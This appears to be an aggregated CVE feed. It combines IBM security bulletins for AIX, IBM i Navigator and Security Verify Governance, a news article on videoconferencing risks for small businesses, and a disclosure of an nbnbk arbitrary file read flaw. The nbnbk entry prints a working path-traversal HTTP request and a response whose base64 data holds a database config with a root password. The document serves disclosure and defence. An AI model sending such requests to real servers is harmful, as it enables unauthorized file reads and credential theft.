IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 238639.

**Security Bulletin**

  

**Summary**

A vulnerability in the AIX SMB client daemon could allow a non-privileged local user to cause a denial of service (CVE-2022-43381). AIX uses the SMB client daemon to access files on SMB servers.

**Vulnerability Details**

**CVEID:**   CVE-2022-43381  
**DESCRIPTION:**   IBM AIX could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238639 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

AIX

7.1

AIX

7.2

AIX

7.3

VIOS

3.1

The following fileset levels are vulnerable:

Fileset

Lower Level

Upper Level

smbc.rte

7.1.0.0

7.1.302.8

smbc.rte

7.2.0.0

7.2.302.8

To determine if your system is vulnerable, execute the following commands:

lslpp -L | grep -i smbc.rte

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

14 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSPHKW","label":"PowerVM Virtual I\\/O Server"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"3.1","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG10","label":"AIX"},"Component":"","Platform":\[{"code":"PF002","label":"AIX"}\],"Version":"7.1,7.2,7.3","Edition":"","Line of Business":{"code":"LOB08","label":"Cognitive Systems"}}\]

CVE-2022-43381: Security Bulletin: AIX is vulnerable to a denial of service due to the AIX SMB client (CVE-2022-43381)

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the AIX TCP/IP kernel extension to cause a denial of service. IBM X-Force ID: 235599.

CVE-2022-40233: IBM AIX denial of service CVE-2022-40233 Vulnerability Report

IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1could allow a non-privileged local user to exploit a vulnerability in CAA to cause a denial of service. IBM X-Force ID: 235183.

CVE-2022-39165: IBM AIX denial of service CVE-2022-39165 Vulnerability Report

Securing videoconferencing solutions is just one of many IT security challenges small businesses are facing, often with limited financial and human resources.

It's no secret that the acceleration of work-from-home and distributed workforce trends — infamously spurred on by the pandemic — has occurred in tandem with the rise of video communications and collaboration platforms, led by Zoom, Microsoft, and Cisco.

But given that videoconferencing now plays a critical role in how businesses interact with their employees, customers, clients, vendors, and others, these platforms carry significant potential security risks, researchers say.

Organizations use videoconferencing to discuss M&A, legal, military, healthcare, intellectual property and other topics, and even corporate strategies. A loss of that data could be catastrophic for a company, its employees, its clients, and its customers.

However, a recent Aite-Novarica Group report on videoconferencing security showed that 93% of IT professionals surveyed acknowledged security vulnerabilities and gaping risks in their videoconferencing solutions.

Among the most relevant risks is the lack of controlled access to conversations that could result in disruption, sabotage, compromise, or exposure of sensitive information, while use of nonsecure, outdated, or unpatched videoconferencing applications can expose security flaws.

"The risks include the potential for interruptions, unauthorized access, and perhaps most concerning, the opportunity for a bad actor to acquire sensitive information," says Craig Lurey, CTO and co-founder at Keeper Security.

**Threats Targeting Video Communications Platforms Multiply**

The use of videoconferencing software by remote workers makes it an easy target for various types of attacks in the wild. For instance, "Zoom-bombing" and other attacks came to the fore in the wake of the first work-from-home wave during the pandemic.

Other threats include DDoS attacks, according to the FBI's Internet Crime Report, and malware. In May, for instance, threat hunters discovered a vulnerability chain in Zoom's chat functionality that could be exploited to allow zero-click remote code execution (RCE).

Security firm Vectra also recently discovered a vulnerability in Microsoft Teams, which found that the platform stores authentication tokens unencrypted, allowing any user to access the secrets file without the need for special permissions. The weakness gives attackers the ability to move through a company’s network much more easily.

But while zero-day exploits and other high-profile attacks get a lot of attention, Mike Parkin, senior technical engineer at Vulcan Cyber points out that many, if not most, attacks still target the users.

"That usually means phishing emails or other social engineering attacks that lead to compromise, or business email compromise attacks that can lead to direct losses through fraud," he says.

**SMBs at Particular Risk From Videoconferencing Threats**

The risk is especially piquant for small and medium-sized businesses (SMBs), researchers say. This segment relied heavily on video collaboration to cut travel costs even before the pandemic, and now represents a class of superusers.

At the same time, SMBs may not have the security awareness or in-house expertise necessary to shore up their defenses. Parkin says SMBs often wrestle to implement and manage a proper cybersecurity program.

"That lack of resources can manifest in not knowing, or being able to implement, proper security on their videoconferencing usage," he says.

George Waller, co-founder and executive vice president of Zerify, agrees that SMBs typically don't have the financial and technical resources that larger companies have.

"Therefore, they are far more vulnerable to even the most basic attacks such as email, phishing and ransomware," he says. "Post-pandemic, many SMBs are still working with limited staff and budgets. Therefore, it's easier to trip them up and cause a devastating data breach."

Meanwhile, this sector often faces financial constraints that could make a cyberattack an extinction-level event. According to a recent IBM breach report, the average size of a data breach in the US is now $9.44 million, and 60% of small businesses go out of business within six months of a data breach.

"When cybercriminals steal sensitive, confidential, or classified data, they can make you pay a ransom to get it back," Waller explains. "They can also sell it to other nefarious people, who can use that data to embarrass or profit from your organization."

Unfortunately, amid the challenges, SMBs are often more of a target than they realize.

"While an attacker’s potential take is smaller, the effort is low, the risk is low, and SMB organizations often have less investment in cybersecurity than a larger organization," Parkin explains. "They can be particularly susceptible to ransomware and business email compromise attacks."

**2FA, Zero Trust Help Secure Video Conferencing**

Fortunately, there are some basic steps that businesses of any size can take to ensure the videoconferencing system they're using doesn't fall into the "low-hanging fruit" category for cybercriminals.

For one, they should ensure their platforms and apps offer two-factor authentication (2FA) for both the meeting creator as well as for the meeting participant, and make sure that login links cannot be shared; most videoconferencing platforms have such basic security features and offer advice on how to use them.

Ricardo Villadiego, CEO and founder of Lumu, says businesses for instance should enable security features such as ID and password and end-to-end encryption that allow SMBs to control access to conversations.

"Avoid repeating passwords, lock down microphones and speakers, and authenticate every user prior to entering a videoconference," he says. "Limit the kind of files and links that can be shared via videoconferencing tools, keep meeting recordings only accessible with a password, and don't discuss information that you wouldn't discuss over the telephone."

Waller adds that snooping on video calls via spyware is a threat that SMBs should be aware of, too.

"Make sure that your camera, microphone, and audio-out data streams are locked down and cannot be spied on with malware," he says. "Organizations should also use an anti-keylogging and anti-screen scraping technology and make sure that AV software is up to date."

Lurey, meanwhile, advises SMBs to protect videoconferencing platforms with a zero-trust security architecture that requires all users be authenticated, authorized, and continuously validated before they can access the application.

"Choose a provider wisely and check that it provides end-to-end encryption," he says. "Most major platforms do."

He adds that it's also imperative to configure the platform correctly by enabling built-in security capabilities and providing consistent enforcement to ensure those security features are never disabled.

Finally, Parkin advises that there are other vulnerabilities in some videoconferencing platforms that require specific steps to counter and stresses the importance of keeping the videoconferencing software up to date. Security teams should also proactively monitor network behavior for anomalous activity and make sure to read terms and conditions of the videoconferencing platform being used.

He adds that with a changing threat landscape, the challenge for SMBs in particular is finding the balance between defending against known threats, being positioned to stay ahead of emerging ones, and managing the risk specific to their environment.

"Small businesses are often resource restricted when it comes to cybersecurity, which means they need to be efficient with the resources they do have," he says. "But focusing on things like user education, which can deliver a lot of value for the investment, can help."

Videoconferencing Worries Grow, With SMBs in Cyberattack Crosshairs

nbnbk commit 879858451d53261d10f77d4709aee2d01c72c301 was discovered to contain an arbitrary file read vulnerability via the component /api/Index/getFileBinary.

**nbnbk 存在任意文件读取**

Nbnbk has an arbitrary file read vulnerability

POST /api/Index/getFileBinary HTTP/1.1
Host: nbnbk:8888
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

url=../application/database.php

通过修改 url 参数来读取文件，来看返回数据。  
Return data by modifying the url parameter to read the file.

HTTP/1.1 200 OK
Date: Fri, 04 Mar 2022 03:39:37 GMT
Server: Apache/2.4.46 (Unix) mod\_fastcgi/mod\_fastcgi-SNAP-0910052141 PHP/7.4.21 OpenSSL/1.0.2u mod\_wsgi/3.5 Python/2.7.13
X-Powered-By: PHP/7.4.21
Access-Control-Allow-Origin: \*
Access-Control-Allow-Methods: GET,POST
Access-Control-Allow-Headers: x-requested-with,content-type,x-access-token,x-access-appid
Content-Length: 2784
Connection: close
Content-Type: text/html; charset=UTF-8

{"code":0,"msg":"操作成功","data":"PD9waHAKLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBUaGlua1BIUCBbIFdFIENBTiBETyBJVCBKVVNU\\r\\nIFRISU5LIF0KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KLy8gfCBDb3B5cmlnaHQgKGMpIDIwMDZ+MjAxNiBo\\r\\ndHRwOi8vdGhpbmtwaHAuY24gQWxsIHJpZ2h0cyByZXNlcnZlZC4KLy8gKy0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0K\\r\\nLy8gfCBMaWNlbnNlZCAoIGh0dHA6Ly93d3cuYXBhY2hlLm9yZy9saWNlbnNlcy9MSUNFTlNFLTIu\\r\\nMCApCi8vICstLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi8vIHwgQXV0aG9yOiBsaXUyMXN0IDxsaXUyMXN0QGdtYWls\\r\\nLmNvbT4KLy8gKy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t\\r\\nLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCi8vIOaVsOaNruW6k+mFjee9ruaWh+S7tgoKcmV0dXJu\\r\\nIFsKICAgIC8vIOaVsOaNruW6k+exu+WeiwogICAgJ3R5cGUnICAgICAgICAgICA9PiAnbXlzcWwn\\r\\nLAogICAgLy8g5pyN5Yqh5Zmo5Zyw5Z2ACiAgICAnaG9zdG5hbWUnICAgICAgID0+ICcxMjcuMC4w\\r\\nLjEnLAogICAgLy8g5pWw5o2u5bqT5ZCNCiAgICAnZGF0YWJhc2UnICAgICAgID0+ICduYm5iaycs\\r\\nCiAgICAvLyDnlKjmiLflkI0KICAgICd1c2VybmFtZScgICAgICAgPT4gJ3Jvb3QnLAogICAgLy8g\\r\\n5a+G56CBCiAgICAncGFzc3dvcmQnICAgICAgID0+ICdwYXNzQCExMjMnLAogICAgLy8g56uv5Y+j\\r\\nCiAgICAnaG9zdHBvcnQnICAgICAgID0+ICc4ODg5JywKICAgIC8vIOi\\/nuaOpWRzbgogICAgJ2Rz\\r\\nbicgICAgICAgICAgICA9PiAnJywKICAgIC8vIOaVsOaNruW6k+i\\/nuaOpeWPguaVsAogICAgJ3Bh\\r\\ncmFtcycgICAgICAgICA9PiBbXSwKICAgIC8vIOaVsOaNruW6k+e8lueggem7mOiupOmHh+eUqHV0\\r\\nZjgKICAgICdjaGFyc2V0JyAgICAgICAgPT4gJ3V0ZjgnLAogICAgLy8g5pWw5o2u5bqT6KGo5YmN\\r\\n57yACiAgICAncHJlZml4JyAgICAgICAgID0+ICdmbF8nLAogICAgLy8g5pWw5o2u5bqT6LCD6K+V\\r\\n5qih5byPCiAgICAnZGVidWcnICAgICAgICAgID0+IGZhbHNlLAogICAgLy8g5pWw5o2u5bqT6YOo\\r\\n572y5pa55byPOjAg6ZuG5Lit5byPKOWNleS4gOacjeWKoeWZqCksMSDliIbluIPlvI8o5Li75LuO\\r\\n5pyN5Yqh5ZmoKQogICAgJ2RlcGxveScgICAgICAgICA9PiAwLAogICAgLy8g5pWw5o2u5bqT6K+7\\r\\n5YaZ5piv5ZCm5YiG56a7IOS4u+S7juW8j+acieaViAogICAgJ3J3X3NlcGFyYXRlJyAgICA9PiBm\\r\\nYWxzZSwKICAgIC8vIOivu+WGmeWIhuemu+WQjiDkuLvmnI3liqHlmajmlbDph48KICAgICdtYXN0\\r\\nZXJfbnVtJyAgICAgPT4gMSwKICAgIC8vIOaMh+WumuS7juacjeWKoeWZqOW6j+WPtwogICAgJ3Ns\\r\\nYXZlX25vJyAgICAgICA9PiAnJywKICAgIC8vIOaYr+WQpuS4peagvOajgOafpeWtl+auteaYr+WQ\\r\\npuWtmOWcqAogICAgJ2ZpZWxkc19zdHJpY3QnICA9PiB0cnVlLAogICAgLy8g5pWw5o2u6ZuG6L+U\\r\\n5Zue57G75Z6LIGFycmF5IOaVsOe7hCBjb2xsZWN0aW9uIENvbGxlY3Rpb27lr7nosaEKICAgICdy\\r\\nZXN1bHRzZXRfdHlwZScgPT4gJ2FycmF5JywKICAgIC8vIOaYr+WQpuiHquWKqOWGmeWFpeaXtumX\\r\\ntOaIs+Wtl+autQogICAgJ2F1dG9fdGltZXN0YW1wJyA9PiBmYWxzZSwKICAgIC8vIOaYr+WQpumc\\r\\ngOimgei\\/m+ihjFNRTOaAp+iDveWIhuaekAogICAgJ3NxbF9leHBsYWluJyAgICA9PiBmYWxzZSwK\\r\\nICAgIC8v5Y+W5raI5YmN5Y+w6Ieq5Yqo5qC85byP5YyWCiAgICAnZGF0ZXRpbWVfZm9ybWF0Jz0+\\r\\nIGZhbHNlLApdOwo=\\r\\n"}

文件信息在 data 字段中，是 base64 编码的格式，但其中包含了大量的 \r\n 导致我们没法直接解码。我们可以通过 js 去将所有 \r\n 删掉。

1.  打开 Google Chrome 游览器
2.  打开一个控制台
3.  输入以下代码

The file information in the data field is in the base64 encoded format, but it contains a large number of \r\n which prevents us from decoding it directly. We can delete all \r\n'through js'.

1.  Open Google Chrome Tour
2.  Open a console
3.  Enter the following code

    a = "$data string"
    a.replaceAll('\r\n', '')
    

演示将上面代码进行转化  
The demonstration transforms the above code

将转化后的数据进行 base64 转码 我使用的是 Google Chrome 插件 FeHelper  
Transcoding the converted data base64 I'm using the Google ChromePlug-inFeHelper

CVE-2022-46492: 🛡️  Nbnbk has an arbitrary file read vulnerability  · Issue #3 · Fanli2012/nbnbk

IBM Security Verify Governance, Identity Manager 10.0.1 stores user credentials in plain clear text which can be read by a remote authenticated user. IBM X-Force ID: 225009.

CVE-2022-22458: IBM Security Verify Governance, Identity Manager information disclosure CVE-2022-22458 Vulnerability Report

IBM Security Verify Governance, Identity Manager 10.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 225004.

CVE-2022-22456: IBM Security Verify Governance, Identity Manager cross-site scripting CVE-2022-22456 Vulnerability Report

IBM Security Verify Governance, Identity Manager 10.0.1 stores sensitive information including user credentials in plain clear text which can be read by a local privileged user. IBM X-Force ID: 225007.

CVE-2022-22457: IBM Security Verify Governance, Identity Manager information disclosure CVE-2022-22457 Vulnerability Report

IBM Navigator for i 7.3, 7.4, and 7.5 could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface. IBM X-Force ID: 239304.

**Security Bulletin**

  

**Summary**

IBM Navigator for i provides server administration functionality for IBM i. An authenticated user with authority to interact with IBM Navigator for i is able to download log files, view file attributes, and perform SQL injection attacks as described in the vulnerability details section. IBM Navigator for i has fixed the issues as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2022-43859  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information for an object they are authorized to but not while using this interface. By performing a UNION based SQL injection an attacker could see file permissions through this interface.  
CVSS Base score: 6.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239304 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2022-43857  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access IBM Navigator for i log files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks and download log files by modifying servlet filter.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239301 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43858  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to access the file system and download files they are authorized to but not while using this interface. The remote authenticated user can bypass the interface checks by modifying a parameter thereby gaining access to their files through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239303 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-43860  
**DESCRIPTION:**   IBM Navigator for i could allow an authenticated user to obtain sensitive information they are authorized to but not while using this interface. By performing an SQL injection an attacker could see user profile attributes through this interface.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/239305 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM i

7.5

IBM i

7.4

IBM i

7.3

  

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

21 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSTS2D","label":"IBM i 7.3 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSB23CE","label":"IBM i 7.5 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SWG60","label":"IBM i"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.5.0,7.4.0, 7.3.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SS9QQS","label":"IBM i 7.4 Preventative Service Planning"},"Component":"","Platform":\[{"code":"PF012","label":"IBM i"}\],"Version":"7.4.0","Edition":"","Line of Business":{"code":"LOB57","label":"Power"}}\]

CVE-2022-43859: IBM Navigator for i is vulnerable to log file access, obtaining file attributes, and SQL Injection attacks due to multiple vulnerabilities.

IBM Security Verify Governance, Identity Manager 10.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 225007.

  

**Summary**

IBM Security Verify Governance, Identity Manager virtual appliance component has addressed the following vulnerability.

**Vulnerability Details**

**CVEID:**   CVE-2022-22461  
**DESCRIPTION:**   IBM Security Verify Governance uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/225077 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Security Verify Governance, Identity Manager virtual appliance component

10.0.1

  

**Remediation/Fixes**

Affected Product(s)

Version(s)

Fix Availability

IBM Security Verify Governance, Identity Manager virtual appliance component

10.0.1.0

10.0.1.0-ISS-ISVG-IMVA-FP0003

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

John Zuccato, Rodney Ryan, Chris Shepherd, Nathan Roane, Vince Dragnea, Troy Fisher, Gabor Minyo, Geoffrey Owden, and Ben Goodspeed from the IBM Security Ethical Hacking Team.

**Change History**

21 Dec 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSRMWJ","label":"IBM Security Identity Manager"},"Component":"virtual appliance Component","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"ISVG 10.0.1.0 Fixpack3","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22461: Security Bulletin: Security vulnerability has been fixed in IBM Security Verify Governance, Identity Manager virtual appliance component

Tag

#ibm